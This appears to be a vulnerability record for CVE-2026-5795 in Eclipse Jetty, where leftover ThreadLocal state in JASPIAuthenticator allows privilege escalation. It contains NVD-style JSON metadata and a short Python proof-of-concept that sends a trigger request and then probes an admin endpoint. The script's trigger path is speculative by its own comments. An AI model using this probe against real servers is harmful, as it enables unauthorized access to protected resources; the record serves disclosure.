CVE-2026-5795

import requests # Target URL target = "http://vulnerable-jetty-server:8080/app" # Step 1: Send a request that triggers the JASPIAuthenticator early return logic # This request might aim to trigger a specific condition that leaves ThreadLocals dirty print("[+] Step 1: Triggering vulnerability to set ThreadLocal...") try: requests.get(target + "/auth-trigger", timeout=5) except Exception as e: print(f"[!] First request completed (可能触发提前返回): {e}") # Step 2: Send a subsequent request immediately, hoping to hit the same thread # This request should inherit the privileges if the exploit is successful print("[+] Step 2: Sending subsequent request to check privilege escalation...") response = requests.get(target + "/admin/protected-resource") if response.status_code == 200: print("[+] Success! Privilege escalation confirmed. Access granted to protected resource.") else: print("[-] Failed. Access denied.")

{"cve": {"id": "CVE-2026-5795", "sourceIdentifier": "[email protected]", "published": "2026-04-08T14:16:32.633", "lastModified": "2026-04-23T11:54:04.517", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Eclipse Jetty, the class JASPIAuthenticator initiates the authentication checks, which set two ThreadLocal variable.\n\n\nUpon returning from the initial checks, there are conditions that cause an early return from the JASPIAuthenticator code without clearing those ThreadLocals.\n\n\nA subsequent request using the same thread inherits the ThreadLocal values, leading to a broken access control and privilege escalation."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-226"}, {"lang": "en", "value": "CWE-287"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.4.0", "versionEndIncluding": "9.4.58", "matchCriteriaId": "D6BB4322-1158-46D7-8A04-2B4FBC3941A4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.0.0", "versionEndIncluding": "10.0.26", "matchCriteriaId": "56F09A5B-49C1-406A-B4F6-D6F2D3FA660E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.0.0", "versionEndIncluding": "11.0.26", "matchCriteriaId": "2B1CFB36-11A3-449E-BDDF-7837CE9E1511"}, {"vulnerable": true, "criteria": "cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:*", "versionStartIncluding": "12.0.0", "versionEndExcluding": "12.0.34", "matchCriteriaId": "FDF5EEDA-C7D3-41A7-824F-E8CA0402C3B5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:*", "versionStartIncluding": "12.1.0", "versionEndExcluding": "12.1.8", "matchCriteriaId": "4A3BA101-07D6-4DE1-A258-A60679A178FB"}]}]}], "references": [{"url": "https://github.com/jetty/jetty.project/security/advisories/GHSA-r7p8-xq5m-436chttps://", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://gitlab.eclipse.org/security/cve-assignment/-/issues/92", "source": "[email protected]", "tags": ["Broken Link"]}]}}